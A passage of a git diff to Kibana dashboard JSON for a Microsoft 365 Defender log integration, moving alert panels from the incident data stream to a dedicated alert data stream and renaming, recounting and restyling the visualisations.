"ae3a1a20-4ff4-4e3d-9bbc-ccb240662789:indexpattern-datasource-layer-7f55a9ab-9515-4d17-844d-c925b2ccdbd1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ae3a1a20-4ff4-4e3d-9bbc-ccb240662789:644633f8-cafb-4bfd-8a03-4a1e7c1146e7", + "type": "index-pattern" + }, + { + "id": "m365_defender-fcf25960-44af-11ed-8375-0168a9970c06", + "name": "b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0:panel_b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0", + "type": "search" + }, + { + "id": "logs-*", + "name": "a567157d-8f3c-4fa5-b7a1-1caa3f9252b2:indexpattern-datasource-layer-2fa8c035-1708-4d32-88fc-b59af7751db4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a567157d-8f3c-4fa5-b7a1-1caa3f9252b2:d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "039e6ffc-d9bb-4bfb-9fde-a7dc9a7938bc:indexpattern-datasource-layer-874da7c4-ebe5-4c5c-a302-094d287b81bb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "039e6ffc-d9bb-4bfb-9fde-a7dc9a7938bc:2128586b-14fe-4907-84a9-4c193f8a2c5f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f825e05-faee-4ad4-9898-69cb1204cf89:indexpattern-datasource-layer-bdba4af5-1396-46ec-ad04-59157e7697f9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f825e05-faee-4ad4-9898-69cb1204cf89:a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8b6e0921-d74d-4fc1-83f4-04b15f37bef0:indexpattern-datasource-layer-45d80486-c9c8-4d28-bbcd-5d29072c9cb9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8b6e0921-d74d-4fc1-83f4-04b15f37bef0:57b64179-81e7-4d61-b50b-23d21323b9da", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2c9ca03f-7301-4749-9825-4b7871d90b21:indexpattern-datasource-layer-24cc5824-23e2-462f-b38f-4769ea95322a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2c9ca03f-7301-4749-9825-4b7871d90b21:7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1a124e55-d897-4528-ad07-033d238e7460:indexpattern-datasource-layer-a0e68595-3ccc-4ff9-90fb-8087bc439020", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1a124e55-d897-4528-ad07-033d238e7460:742836c8-3532-4e18-b067-26e3af1b0e3b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1a124e55-d897-4528-ad07-033d238e7460:438f3787-c321-45a5-9cca-89571591b016", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "80ad6adc-885a-471b-b9f1-ca6742177339:indexpattern-datasource-layer-32a410b6-1ed8-4397-ab2e-151edec25e80", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "80ad6adc-885a-471b-b9f1-ca6742177339:dbc8860d-394c-46cb-a626-67a20c1862c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e81b4ea3-793d-4827-a77a-df2c9bf006d5:indexpattern-datasource-layer-d2d7332c-5fbd-4acc-bef9-a1f2a2a6a25d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e81b4ea3-793d-4827-a77a-df2c9bf006d5:be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a6c60337-0230-4d71-90d6-fcbf09ca19bb:indexpattern-datasource-layer-bf6ca0e6-4c26-4cff-b35c-a1a578a38d20", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a6c60337-0230-4d71-90d6-fcbf09ca19bb:bfd73a62-e6c5-4126-9065-f4b17a1e4680", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a6c60337-0230-4d71-90d6-fcbf09ca19bb:108199c0-a675-4fe1-87a9-4599aa85db91", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d7865055-20d9-4c1f-a0c2-4ddcd73a849d:indexpattern-datasource-layer-5b675bca-2096-430a-ac1e-6a435a5c3e34", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d7865055-20d9-4c1f-a0c2-4ddcd73a849d:75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57c437df-b2a8-40de-b8c5-26fadf2b3140:indexpattern-datasource-layer-6e6323ee-5d54-4720-85b5-f567b8ef9d21", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57c437df-b2a8-40de-b8c5-26fadf2b3140:dd37b426-93bd-4376-8f4d-831cfa0673d8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57c437df-b2a8-40de-b8c5-26fadf2b3140:5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6093d81b-dac2-417b-98cb-5531284af94f:indexpattern-datasource-layer-3f509783-a68e-46a5-a9ea-6c51a0bcf036", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6093d81b-dac2-417b-98cb-5531284af94f:eaea7ed4-6b0d-4522-8e92-34b831024614", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6093d81b-dac2-417b-98cb-5531284af94f:8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "type": "index-pattern" + }, + { + "id": "m365_defender-989afc60-44a5-11ed-8375-0168a9970c06", + "name": "b4755871-88ae-45f2-813c-dbe4ca1cc54b:panel_b4755871-88ae-45f2-813c-dbe4ca1cc54b", "type": "search" }, { "id": "logs-*", - "name": "controlGroup_72c489e6-c07a-4c74-8c35-d70b4b4e8ccd:optionsListDataView", + "name": "controlGroup_72c489e6-c07a-4c74-8c35-d70b4b4e8ccd:rangeSliderDataView", "type": "index-pattern" }, { diff --git a/packages/m365_defender/kibana/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03.json b/packages/m365_defender/kibana/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03.json index 6e3c80aa2ed..adc25858a52 100644 --- a/packages/m365_defender/kibana/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03.json +++ b/packages/m365_defender/kibana/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03.json @@ -4,7 +4,7 @@ "chainingSystem": "HIERARCHICAL", "controlStyle": "oneLine", "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"5779a7c6-acf5-4f7d-ac4c-caae9517d95e\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"5779a7c6-acf5-4f7d-ac4c-caae9517d95e\",\"fieldName\":\"event.provider\",\"title\":\"Service Source\",\"enhancements\":{}}},\"e61071e0-ba4d-4765-9267-e035395b221f\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"e61071e0-ba4d-4765-9267-e035395b221f\",\"fieldName\":\"m365_defender.incident.alert.severity\",\"title\":\"Severity\",\"selectedOptions\":[],\"enhancements\":{}}},\"ec5d23b5-535c-483a-88ad-279762f3d5ca\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"ec5d23b5-535c-483a-88ad-279762f3d5ca\",\"fieldName\":\"m365_defender.incident.alert.detection_source\",\"title\":\"Detection Source\",\"enhancements\":{}}},\"cef3df17-225a-4373-a231-caa594cd1bf4\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"cef3df17-225a-4373-a231-caa594cd1bf4\",\"fieldName\":\"m365_defender.incident.alert.evidence.roles\",\"title\":\"Evidence Role\",\"enhancements\":{}}}}" + "panelsJSON": "{\"5779a7c6-acf5-4f7d-ac4c-caae9517d95e\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"5779a7c6-acf5-4f7d-ac4c-caae9517d95e\",\"fieldName\":\"event.provider\",\"title\":\"Service Source\",\"enhancements\":{}}},\"ec5d23b5-535c-483a-88ad-279762f3d5ca\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"ec5d23b5-535c-483a-88ad-279762f3d5ca\",\"fieldName\":\"m365_defender.alert.detection_source\",\"title\":\"Detection Source\",\"enhancements\":{},\"selectedOptions\":[]}},\"cef3df17-225a-4373-a231-caa594cd1bf4\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"cef3df17-225a-4373-a231-caa594cd1bf4\",\"fieldName\":\"m365_defender.alert.evidence.roles\",\"title\":\"Evidence Role\",\"enhancements\":{},\"selectedOptions\":[]}},\"23cace2f-34ed-4efa-bed4-ccdc7318dfb8\":{\"type\":\"rangeSliderControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"23cace2f-34ed-4efa-bed4-ccdc7318dfb8\",\"fieldName\":\"event.severity\",\"title\":\"event.severity\",\"enhancements\":{}}}}" }, "description": "Overview of Microsoft 365 Defender Alerts", "kibanaSavedObjectMeta": { @@ -43,7 +43,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "### Navigation\n\n#### M365 Defender\n\n#### EventHub Datastream \n[Alert Events](#/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c) \n[Device Events](#/dashboard/m365_defender-c0b796d0-720a-11ed-8657-c59f6ece834c) \n[App \u0026 Identity Events](#/dashboard/m365_defender-d587df00-745f-11ed-8657-c59f6ece834c) \n[Email Events](#/dashboard/m365_defender-3caf3c00-7456-11ed-8657-c59f6ece834c) \n\n#### Incident Datastream (Graph API) \n\n[Incident Events](#/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06) \n**[Alert Events](#/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03)** \n\n#### Description\n\nThis dashboard visualizes Alert type events collected from the MS Graph API using the Incident Datastream\n\n", + "markdown": "### Navigation\n\n#### M365 Defender\n\n#### EventHub Datastream \n[Alert Events](#/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c) \n[Device](#/dashboard/m365_defender-c0b796d0-720a-11ed-8657-c59f6ece834c) \n[App \u0026 Identity](#/dashboard/m365_defender-d587df00-745f-11ed-8657-c59f6ece834c) \n[Email](#/dashboard/m365_defender-3caf3c00-7456-11ed-8657-c59f6ece834c) \n\n#### Graph API Datastream\n[Incident](#/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06) \n**[Alert](#/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03)** \n\n#### Description\n\nThis dashboard showcases various alert metrics, including counts for new, in-progress, resolved, assigned, and unassigned alerts. It categorizes alerts by severity, category, determination, and service source. The display features top 10 email sender IPs with suspicious or malicious verdicts, leading detection sources, a timeline of alerts, a table highlighting top MITRE techniques, the top 10 compromised user accounts, the most attacked devices, and concludes with essential details of the alerts.\n\n", "openLinksInNewTab": false }, "title": "", @@ -52,7 +52,7 @@ } }, "gridData": { - "h": 134, + "h": 129, "i": "5852497b-14e8-4c1e-a9ab-fc387a3ae672", "w": 8, "x": 0, @@ -74,7 +74,7 @@ }, { "id": "logs-*", - "name": "4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "name": "9f120d0d-531c-42be-b1ed-5dc4683d5b15", "type": "index-pattern" } ], @@ -86,9 +86,7 @@ "6ddc53cd-2bbd-4616-837b-3fbe0712ca7e": { "columnOrder": [ "330da6b3-a0e3-41b9-8103-69b3381f1788", - "6400adfe-4702-4f13-923f-f94d87aa0ced", - "6400adfe-4702-4f13-923f-f94d87aa0cedX0", - "6400adfe-4702-4f13-923f-f94d87aa0cedX1" + "6400adfe-4702-4f13-923f-f94d87aa0ced" ], "columns": { "330da6b3-a0e3-41b9-8103-69b3381f1788": { @@ -108,37 +106,37 @@ { "input": { "language": "kuery", - "query": "m365_defender.incident.alert.status : \"new\" " + "query": "source.user.name : *" }, - "label": "New Alerts" + "label": "Assigned Alerts" }, { "input": { "language": "kuery", - "query": "m365_defender.incident.alert.status : \"inProgress\" " + "query": "not (source.user.name : *)" }, - "label": "In Progress Alerts" + "label": "Unassigned Alerts" }, { "input": { "language": "kuery", - "query": "m365_defender.incident.alert.status : \"resolved\" " + "query": "m365_defender.alert.status : \"new\" " }, - "label": "Resolved Alerts" + "label": "New Alerts" }, { "input": { "language": "kuery", - "query": "m365_defender.incident.alert.severity : \"high\"" + "query": "m365_defender.alert.status : \"inProgress\" " }, - "label": "High Severity Alerts" + "label": "In Progress Alerts" }, { "input": { "language": "kuery", - "query": "not (m365_defender.incident.alert.assigned_to : * )" + "query": "m365_defender.alert.status : \"resolved\" " }, - "label": "Unassigned Alerts" + "label": "Resolved Alerts" } ] }, @@ -149,53 +147,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "formula", - "params": { - "formula": "defaults(unique_count(m365_defender.incident.alert.id), 0)", - "isFormulaBroken": false - }, - "references": [ - "6400adfe-4702-4f13-923f-f94d87aa0cedX1" - ], - "scale": "ratio" - }, - "6400adfe-4702-4f13-923f-f94d87aa0cedX0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Count", - "operationType": "unique_count", + "operationType": "count", "params": { "emptyAsNull": false }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" - }, - "6400adfe-4702-4f13-923f-f94d87aa0cedX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Count", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "6400adfe-4702-4f13-923f-f94d87aa0cedX0", - 0 - ], - "location": { - "max": 58, - "min": 0 - }, - "name": "defaults", - "text": "defaults(unique_count(m365_defender.incident.alert.id), 0)", - "type": "function" - } - }, - "references": [ - "6400adfe-4702-4f13-923f-f94d87aa0cedX0" - ], - "scale": "ratio" + "sourceField": "___records___" } }, "incompleteColumns": {} @@ -215,17 +172,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "index": "9f120d0d-531c-42be-b1ed-5dc4683d5b15", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -273,7 +230,7 @@ }, { "id": "logs-*", - "name": "2128586b-14fe-4907-84a9-4c193f8a2c5f", + "name": "a155689d-f319-4f42-831d-2097922e6b7c", "type": "index-pattern" } ], @@ -293,13 +250,16 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "91075489-5815-4881-af42-d6e31205b1c5": { "customLabel": true, - "dataType": "string", + "dataType": "number", "isBucketed": true, "label": "Severity", "operationType": "terms", @@ -311,10 +271,14 @@ }, "orderDirection": "desc", "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 5 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.severity" + "sourceField": "event.severity" } }, "incompleteColumns": {} @@ -331,17 +295,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "2128586b-14fe-4907-84a9-4c193f8a2c5f", + "index": "a155689d-f319-4f42-831d-2097922e6b7c", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -366,7 +330,8 @@ "numberDisplay": "percent", "primaryGroups": [ "91075489-5815-4881-af42-d6e31205b1c5" - ] + ], + "truncateLegend": false } ], "shape": "pie" @@ -387,7 +352,7 @@ "y": 8 }, "panelIndex": "00c0b388-64b8-49c8-9ccb-de8e58030b4d", - "title": "Distribution of Alerts by Severity [Logs Microsoft 365 Defender]", + "title": "Alerts by Severity [Logs Microsoft 365 Defender]", "type": "lens", "version": "8.7.1" }, @@ -402,7 +367,7 @@ }, { "id": "logs-*", - "name": "d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "name": "db899305-b961-454c-8390-5d1d2395a3e2", "type": "index-pattern" } ], @@ -422,9 +387,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "ccf17a24-dc07-4800-983f-8c507665a6a0": { "customLabel": true, @@ -460,17 +428,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "index": "db899305-b961-454c-8390-5d1d2395a3e2", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -495,9 +463,10 @@ } ], "legend": { - "isVisible": true, + "isVisible": false, "legendSize": "auto", - "position": "right" + "position": "right", + "showSingleSeries": false }, "preferredSeriesType": "bar_stacked", "title": "Empty XY chart", @@ -525,7 +494,7 @@ "y": 8 }, "panelIndex": "8e4019a0-6594-4eaf-9358-c343b72aba84", - "title": "Distribution of Alerts by Category [Logs Microsoft 365 Defender]", + "title": "Alerts by Category [Logs Microsoft 365 Defender]", "type": "lens", "version": "8.7.1" }, @@ -540,7 +509,7 @@ }, { "id": "logs-*", - "name": "57b64179-81e7-4d61-b50b-23d21323b9da", + "name": "d3ac725d-8f46-4c0d-a938-280f91905f74", "type": "index-pattern" } ], @@ -560,9 +529,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "fe4ba4cc-3a4f-4dbf-b79d-a3b6550f08b6": { "customLabel": true, @@ -578,10 +550,14 @@ }, "orderDirection": "desc", "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.determination" + "sourceField": "m365_defender.alert.determination" } }, "incompleteColumns": {} @@ -598,17 +574,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "57b64179-81e7-4d61-b50b-23d21323b9da", + "index": "d3ac725d-8f46-4c0d-a938-280f91905f74", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -647,9 +623,10 @@ } ], "legend": { - "isVisible": true, + "isVisible": false, "legendSize": "auto", - "position": "right" + "position": "right", + "showSingleSeries": false }, "preferredSeriesType": "bar_stacked", "tickLabelsVisibilitySettings": { @@ -681,7 +658,7 @@ "y": 8 }, "panelIndex": "1f836fdc-61f4-4cf4-a392-50276a2b77f1", - "title": "Distribution of Alerts by Determination [Logs Microsoft 365 Defender]", + "title": "Alerts by Determination [Logs Microsoft 365 Defender]", "type": "lens", "version": "8.7.1" }, @@ -696,7 +673,7 @@ }, { "id": "logs-*", - "name": "a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "name": "f7a464e2-0eb1-4f4a-9d10-a16d8f69348c", "type": "index-pattern" } ], @@ -735,9 +712,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" } }, "incompleteColumns": {} @@ -754,17 +734,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "index": "f7a464e2-0eb1-4f4a-9d10-a16d8f69348c", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -789,9 +769,10 @@ } ], "legend": { - "isVisible": true, + "isVisible": false, "legendSize": "auto", - "position": "right" + "position": "right", + "showSingleSeries": false }, "preferredSeriesType": "bar_stacked", "title": "Empty XY chart", @@ -819,7 +800,7 @@ "y": 31 }, "panelIndex": "b5b7f2a4-1d6e-4812-8724-5a771014c3ae", - "title": "Distribution of Alerts by Service Source [Logs Microsoft 365 Defender]", + "title": "Alerts by Service Source [Logs Microsoft 365 Defender]", "type": "lens", "version": "8.7.1" }, @@ -834,12 +815,12 @@ }, { "id": "logs-*", - "name": "742836c8-3532-4e18-b067-26e3af1b0e3b", + "name": "39ecb368-ff15-47cd-a634-68075279a23e", "type": "index-pattern" }, { "id": "logs-*", - "name": "438f3787-c321-45a5-9cca-89571591b016", + "name": "72677633-892f-44ca-afb3-567a4350bc30", "type": "index-pattern" } ], @@ -859,9 +840,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "d8c5d781-6442-4a9f-b91b-8b7b29d8e73a": { "customLabel": true, @@ -877,10 +861,14 @@ }, "orderDirection": "desc", "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.evidence.sender_ip" + "sourceField": "m365_defender.alert.evidence.sender_ip" } }, "incompleteColumns": {} @@ -896,36 +884,52 @@ "meta": { "alias": null, "disabled": false, - "index": "742836c8-3532-4e18-b067-26e3af1b0e3b", - "key": "m365_defender.incident.alert.evidence.verdict", + "index": "39ecb368-ff15-47cd-a634-68075279a23e", "negate": false, "params": [ - "malicious", - "suspicious" - ], - "type": "phrases", - "value": [ - "malicious", - "suspicious" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { + { + "meta": { + "alias": null, + "disabled": false, + "field": "m365_defender.alert.evidence.verdict", + "index": "logs-*", + "key": "m365_defender.alert.evidence.verdict", + "negate": false, + "params": { + "query": "malicious" + }, + "type": "phrase" + }, + "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.verdict": "malicious" + "m365_defender.alert.evidence.verdict": "malicious" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "m365_defender.alert.evidence.verdict", + "index": "logs-*", + "key": "m365_defender.alert.evidence.verdict", + "negate": false, + "params": { + "query": "suspicious" + }, + "type": "phrase" }, - { + "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.verdict": "suspicious" + "m365_defender.alert.evidence.verdict": "suspicious" } } - ] - } - } + } + ], + "relation": "OR", + "type": "combined" + }, + "query": {} }, { "$state": { @@ -935,17 +939,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "438f3787-c321-45a5-9cca-89571591b016", + "index": "72677633-892f-44ca-afb3-567a4350bc30", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1002,7 +1006,7 @@ }, { "id": "logs-*", - "name": "7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "name": "25f2fb8c-9456-418f-aa6a-d5e4037d63c7", "type": "index-pattern" } ], @@ -1022,9 +1026,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "901ba472-02eb-4500-9ead-77371aa87f8c": { "customLabel": true, @@ -1040,10 +1047,14 @@ }, "orderDirection": "desc", "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.detection_source" + "sourceField": "m365_defender.alert.detection_source" } }, "incompleteColumns": {} @@ -1060,17 +1071,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "index": "25f2fb8c-9456-418f-aa6a-d5e4037d63c7", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1127,7 +1138,7 @@ }, { "id": "logs-*", - "name": "be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "name": "5b859903-4472-47cb-8798-06ff556b7753", "type": "index-pattern" } ], @@ -1147,9 +1158,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "f65e2e2e-1d06-4965-871e-0c559e325343": { "customLabel": true, @@ -1162,7 +1176,7 @@ "interval": "auto" }, "scale": "interval", - "sourceField": "m365_defender.incident.alert.last_update_datetime" + "sourceField": "@timestamp" } }, "incompleteColumns": {} @@ -1179,17 +1193,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "index": "5b859903-4472-47cb-8798-06ff556b7753", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1216,7 +1230,9 @@ "legend": { "isVisible": true, "legendSize": "auto", - "position": "right" + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false }, "preferredSeriesType": "line", "title": "Empty XY chart", @@ -1244,7 +1260,7 @@ "y": 52 }, "panelIndex": "62846e2a-f412-4cf9-b8ea-b08bc7fbd613", - "title": "Count of Alerts Over Time [Logs Microsoft 365 Defender]", + "title": "Alerts Over Time [Logs Microsoft 365 Defender]", "type": "lens", "version": "8.7.1" }, @@ -1259,7 +1275,7 @@ }, { "id": "logs-*", - "name": "dbc8860d-394c-46cb-a626-67a20c1862c8", + "name": "c9581305-ba3a-4ead-91b7-4535d99f4525", "type": "index-pattern" } ], @@ -1280,13 +1296,16 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "9c52de5e-c802-4a77-8cb4-b60368976cd9": { "customLabel": true, - "dataType": "string", + "dataType": "number", "isBucketed": true, "label": "Severity", "operationType": "terms", @@ -1297,11 +1316,15 @@ "type": "column" }, "orderDirection": "desc", - "otherBucket": false, - "size": 6 + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 5 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.severity" + "sourceField": "event.severity" }, "e278fc5e-3a46-416d-be86-884554b160dc": { "customLabel": true, @@ -1314,7 +1337,7 @@ "interval": "auto" }, "scale": "interval", - "sourceField": "m365_defender.incident.alert.last_update_datetime" + "sourceField": "@timestamp" } }, "incompleteColumns": {} @@ -1331,17 +1354,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "dbc8860d-394c-46cb-a626-67a20c1862c8", + "index": "c9581305-ba3a-4ead-91b7-4535d99f4525", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1385,7 +1408,8 @@ "legend": { "isVisible": true, "legendSize": "auto", - "position": "right" + "position": "right", + "shouldTruncate": false }, "preferredSeriesType": "line", "tickLabelsVisibilitySettings": { @@ -1432,7 +1456,7 @@ }, { "id": "logs-*", - "name": "75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "name": "236c3bc5-5f69-4d41-a5cd-c581f069e57e", "type": "index-pattern" } ], @@ -1464,7 +1488,7 @@ "type": "column" }, "orderDirection": "desc", - "otherBucket": true, + "otherBucket": false, "parentFormat": { "id": "terms" }, @@ -1481,7 +1505,7 @@ "label": "Count", "operationType": "count", "params": { - "emptyAsNull": true + "emptyAsNull": false }, "scale": "ratio", "sourceField": "___records___" @@ -1505,17 +1529,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "index": "236c3bc5-5f69-4d41-a5cd-c581f069e57e", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - 